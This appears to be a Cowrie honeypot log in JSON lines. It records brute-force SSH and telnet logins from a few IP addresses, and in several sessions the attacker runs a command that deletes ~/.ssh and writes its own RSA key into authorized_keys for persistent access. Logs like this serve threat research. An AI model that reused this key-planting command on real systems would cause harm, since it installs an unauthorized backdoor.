{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:39:41.378942Z","src_ip":"185.152.45.241","session":"18572e26c54a"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:39:41.379764Z","src_ip":"185.152.45.241","session":"c52adcc67aa1"}
{"eventid":"cowrie.session.closed","duration":13.714162111282349,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:39:44.837209Z","src_ip":"212.227.235.229","session":"287d05e28f7d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37587,"dst_ip":"1.2.3.4","dst_port":23,"session":"d31f1f0f5fbd","protocol":"telnet","message":"New connection: 212.227.235.229:37587 (1.2.3.4:23) [session: d31f1f0f5fbd]","sensor":"my-vps","timestamp":"2025-09-09T02:39:45.076662Z"}
{"eventid":"cowrie.session.closed","duration":12.666054725646973,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:39:47.646107Z","src_ip":"212.227.235.229","session":"2ba0d94a9d11"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37611,"dst_ip":"1.2.3.4","dst_port":23,"session":"0ccf65b9c465","protocol":"telnet","message":"New connection: 212.227.235.229:37611 (1.2.3.4:23) [session: 0ccf65b9c465]","sensor":"my-vps","timestamp":"2025-09-09T02:39:47.900437Z"}
{"eventid":"cowrie.session.closed","duration":13.81693959236145,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:39:47.994807Z","src_ip":"212.227.235.229","session":"2047af5d7691"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37618,"dst_ip":"1.2.3.4","dst_port":23,"session":"1816d7e0103c","protocol":"telnet","message":"New connection: 212.227.235.229:37618 (1.2.3.4:23) [session: 1816d7e0103c]","sensor":"my-vps","timestamp":"2025-09-09T02:39:48.262389Z"}
{"eventid":"cowrie.session.closed","duration":12.919008016586304,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:39:51.887861Z","src_ip":"212.227.235.229","session":"5c707686e136"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37747,"dst_ip":"1.2.3.4","dst_port":23,"session":"98637a041f19","protocol":"telnet","message":"New connection: 212.227.235.229:37747 (1.2.3.4:23) [session: 98637a041f19]","sensor":"my-vps","timestamp":"2025-09-09T02:39:52.154642Z"}
{"eventid":"cowrie.session.closed","duration":13.698390245437622,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:39:52.901014Z","src_ip":"212.227.235.229","session":"9eddfadfceca"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37757,"dst_ip":"1.2.3.4","dst_port":23,"session":"1ffb6f6da1d5","protocol":"telnet","message":"New connection: 212.227.235.229:37757 (1.2.3.4:23) [session: 1ffb6f6da1d5]","sensor":"my-vps","timestamp":"2025-09-09T02:39:53.282182Z"}
{"eventid":"cowrie.session.closed","duration":13.273040294647217,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:39:54.406565Z","src_ip":"212.227.235.229","session":"6bc083aae47a"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":59082,"dst_ip":"1.2.3.4","dst_port":22,"session":"de22fcb1e86f","protocol":"ssh","message":"New connection: 217.72.205.35:59082 (1.2.3.4:22) [session: de22fcb1e86f]","sensor":"my-vps","timestamp":"2025-09-09T02:39:55.742269Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:39:55.743396Z","src_ip":"217.72.205.35","session":"de22fcb1e86f"}
{"eventid":"cowrie.session.closed","duration":13.253509044647217,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:39:58.330108Z","src_ip":"212.227.235.229","session":"d31f1f0f5fbd"}
{"eventid":"cowrie.session.closed","duration":12.97087836265564,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:40:00.871255Z","src_ip":"212.227.235.229","session":"0ccf65b9c465"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37934,"dst_ip":"1.2.3.4","dst_port":23,"session":"7ce3359fbcbc","protocol":"telnet","message":"New connection: 212.227.235.229:37934 (1.2.3.4:23) [session: 7ce3359fbcbc]","sensor":"my-vps","timestamp":"2025-09-09T02:40:01.112076Z"}
{"eventid":"cowrie.session.closed","duration":13.325369358062744,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:40:01.587697Z","src_ip":"212.227.235.229","session":"1816d7e0103c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43598,"dst_ip":"1.2.3.4","dst_port":22,"session":"d551c23baf51","protocol":"ssh","message":"New connection: 212.227.235.229:43598 (1.2.3.4:22) [session: d551c23baf51]","sensor":"my-vps","timestamp":"2025-09-09T02:40:01.894590Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:40:01.897563Z","src_ip":"212.227.235.229","session":"d551c23baf51"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:40:02.283967Z","src_ip":"212.227.235.229","session":"d551c23baf51"}
{"eventid":"cowrie.login.success","username":"root","password":"scenic","message":"login attempt [root/scenic] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:40:03.851220Z","src_ip":"212.227.235.229","session":"d551c23baf51"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:40:04.663152Z","src_ip":"212.227.235.229","session":"d551c23baf51"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:40:04.663875Z","src_ip":"212.227.235.229","session":"d551c23baf51"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:40:04.664668Z","src_ip":"212.227.235.229","session":"d551c23baf51"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:40:05.063117Z","src_ip":"212.227.235.229","session":"d551c23baf51"}
{"eventid":"cowrie.session.closed","duration":13.113742113113403,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:40:05.268314Z","src_ip":"212.227.235.229","session":"98637a041f19"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:40:05.955990Z","src_ip":"212.227.235.229","session":"d551c23baf51"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:40:05.956702Z","src_ip":"212.227.235.229","session":"d551c23baf51"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:40:06.353166Z","src_ip":"212.227.235.229","session":"d551c23baf51"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:40:06.354025Z","src_ip":"212.227.235.229","session":"d551c23baf51"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45522,"dst_ip":"1.2.3.4","dst_port":22,"session":"ca932d1e4b8a","protocol":"ssh","message":"New connection: 212.227.235.229:45522 (1.2.3.4:22) [session: ca932d1e4b8a]","sensor":"my-vps","timestamp":"2025-09-09T02:40:06.714619Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:40:06.718737Z","src_ip":"212.227.235.229","session":"ca932d1e4b8a"}
{"eventid":"cowrie.session.closed","duration":13.469558238983154,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:40:06.751673Z","src_ip":"212.227.235.229","session":"1ffb6f6da1d5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37978,"dst_ip":"1.2.3.4","dst_port":23,"session":"3db62e47449e","protocol":"telnet","message":"New connection: 212.227.235.229:37978 (1.2.3.4:23) [session: 3db62e47449e]","sensor":"my-vps","timestamp":"2025-09-09T02:40:06.997847Z"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:40:07.095369Z","src_ip":"212.227.235.229","session":"ca932d1e4b8a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:40:08.606526Z","src_ip":"212.227.235.229","session":"ca932d1e4b8a"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:40:09.991706Z","src_ip":"212.227.235.229","session":"ca932d1e4b8a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46830,"dst_ip":"1.2.3.4","dst_port":22,"session":"b1ef1c2a8b4d","protocol":"ssh","message":"New connection: 212.227.235.229:46830 (1.2.3.4:22) [session: b1ef1c2a8b4d]","sensor":"my-vps","timestamp":"2025-09-09T02:40:10.374333Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:40:10.375734Z","src_ip":"212.227.235.229","session":"b1ef1c2a8b4d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:40:10.758516Z","src_ip":"212.227.235.229","session":"b1ef1c2a8b4d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:40:12.288043Z","src_ip":"212.227.235.229","session":"b1ef1c2a8b4d"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:40:12.675720Z","src_ip":"212.227.235.229","session":"b1ef1c2a8b4d"}
{"eventid":"cowrie.session.closed","duration":"10.8","message":"Connection lost after 10.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:40:12.683239Z","src_ip":"212.227.235.229","session":"d551c23baf51"}
{"eventid":"cowrie.session.closed","duration":13.156426906585693,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:40:14.268414Z","src_ip":"212.227.235.229","session":"7ce3359fbcbc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50536,"dst_ip":"1.2.3.4","dst_port":22,"session":"bcd865be3ff1","protocol":"ssh","message":"New connection: 212.227.235.229:50536 (1.2.3.4:22) [session: bcd865be3ff1]","sensor":"my-vps","timestamp":"2025-09-09T02:40:15.746085Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:40:15.746967Z","src_ip":"212.227.235.229","session":"bcd865be3ff1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:40:15.994267Z","src_ip":"212.227.235.229","session":"bcd865be3ff1"}
{"eventid":"cowrie.login.success","username":"root","password":"1A2b3c4d","message":"login attempt [root/1A2b3c4d] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:40:17.027558Z","src_ip":"212.227.235.229","session":"bcd865be3ff1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:40:17.581628Z","src_ip":"212.227.235.229","session":"bcd865be3ff1"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:40:17.582376Z","src_ip":"212.227.235.229","session":"bcd865be3ff1"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:40:17.583455Z","src_ip":"212.227.235.229","session":"bcd865be3ff1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:40:17.837989Z","src_ip":"212.227.235.229","session":"bcd865be3ff1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:40:18.353989Z","src_ip":"212.227.235.229","session":"bcd865be3ff1"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:40:18.354685Z","src_ip":"212.227.235.229","session":"bcd865be3ff1"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:40:18.613018Z","src_ip":"212.227.235.229","session":"bcd865be3ff1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:40:18.613896Z","src_ip":"212.227.235.229","session":"bcd865be3ff1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51086,"dst_ip":"1.2.3.4","dst_port":22,"session":"39987b675f21","protocol":"ssh","message":"New connection: 212.227.235.229:51086 (1.2.3.4:22) [session: 39987b675f21]","sensor":"my-vps","timestamp":"2025-09-09T02:40:18.860187Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:40:18.861053Z","src_ip":"212.227.235.229","session":"39987b675f21"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:40:19.116584Z","src_ip":"212.227.235.229","session":"39987b675f21"}
{"eventid":"cowrie.session.closed","duration":12.601155996322632,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:40:19.598911Z","src_ip":"212.227.235.229","session":"3db62e47449e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38199,"dst_ip":"1.2.3.4","dst_port":23,"session":"971a1ce96e7e","protocol":"telnet","message":"New connection: 212.227.235.229:38199 (1.2.3.4:23) [session: 971a1ce96e7e]","sensor":"my-vps","timestamp":"2025-09-09T02:40:19.875759Z"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:40:20.168249Z","src_ip":"212.227.235.229","session":"39987b675f21"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:40:21.424881Z","src_ip":"212.227.235.229","session":"39987b675f21"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51670,"dst_ip":"1.2.3.4","dst_port":22,"session":"52f63b1affe4","protocol":"ssh","message":"New connection: 212.227.235.229:51670 (1.2.3.4:22) [session: 52f63b1affe4]","sensor":"my-vps","timestamp":"2025-09-09T02:40:21.681483Z"}
